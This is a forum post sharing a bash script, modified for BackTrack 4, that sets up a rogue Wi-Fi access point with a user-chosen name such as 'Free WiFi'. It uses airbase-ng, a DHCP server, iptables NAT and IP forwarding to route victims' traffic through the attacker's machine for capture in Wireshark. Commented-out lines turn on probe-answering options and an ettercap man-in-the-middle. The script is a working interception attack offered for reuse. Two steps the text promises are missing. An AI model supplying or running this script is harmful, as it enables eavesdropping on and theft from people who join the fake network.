I've finally got this working after a long while. My setup is as follows:
Vista laptop running BT4-Beta in VMware Player
Internet source is a wireless connection using the onboard laptop wifi card, to my Netgear DG834GT router.
Using the Alfa USB wifi adapter for creating the AP.
Below is the script which I have modified to get it to work with BT4-Beta. I haven't tried it in BT4 PreFinal.
Note: The script is also modified so that it will not use the -P and -C options of airbase (the ones which interfere with other clients aka illegal). If you want that on then uncomment and comment the relevant lines.
I also have the ettercap section of the script commented out because I found that BT lagged too much or crashed. You can try it though; just uncomment the line.
Also: I have modified the script so that it does not ask for the wireless and Internet source interfaces - I got sick of typing wlan0 and eth0 every time I ran the script. It only asks for the AP SSID; the two interfaces are hard coded as wlan0 for the Alfa, and eth0 for the Internet source (even though my Internet source is wireless, not ethernet).
This is running very fast from the client's point of view; I can surf online and I can't tell the difference between using the rogue AP or connecting directly to the router. I have only tried this using an iPhone as the client so far. I can also open up Wireshark and listen on the at0 interface to capture all the traffic passed through the rogue AP.
Be sure to turn networking on in BT before running the script - otherwise BT will not have an Internet connection to route for the clients. I do this by:
Then I do a quick test using wget to verify that my internet connection is available to BT:
Modified script for BT4-Beta:
Hope this helps those that couldn't get this working in BT4. Thanks to the original author for this interesting experiment.
# The iface inputs are commented out and hard coded, to save having to type them every time the script is executed
#echo -n "Enter the name of the interface connected to the internet, for example eth0: "
#read -e IFACE
#echo -n "Enter your wireless interface name, for example wlan0: "
#read -e WIFACE
# here I have hard coded the two interfaces, change them if yours are different
IFACE=eth0
WIFACE=wlan0
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
kill `cat /var/run/dhcpd.pid`
killall -9 dhcpd airbase-ng ettercap
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
# Below is the safe airbase command which does not use the evil options
konsole -e airbase-ng -e "$ESSID" -v $WIFACE &
# The line below is commented out, it uses the evil options -P and -C
#konsole -e airbase-ng -e "$ESSID" -P -C 30 -v $WIFACE &
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --table nat --flush
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
echo > '/var/lib/dhcp3/dhcpd.leases'
konsole -e dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 &
# Below ettercap is commented out, just remove the # if you want it on
#konsole -e ettercap -T -q -p -i at0 // // &
echo "1" > /proc/sys/net/ipv4/ip_forward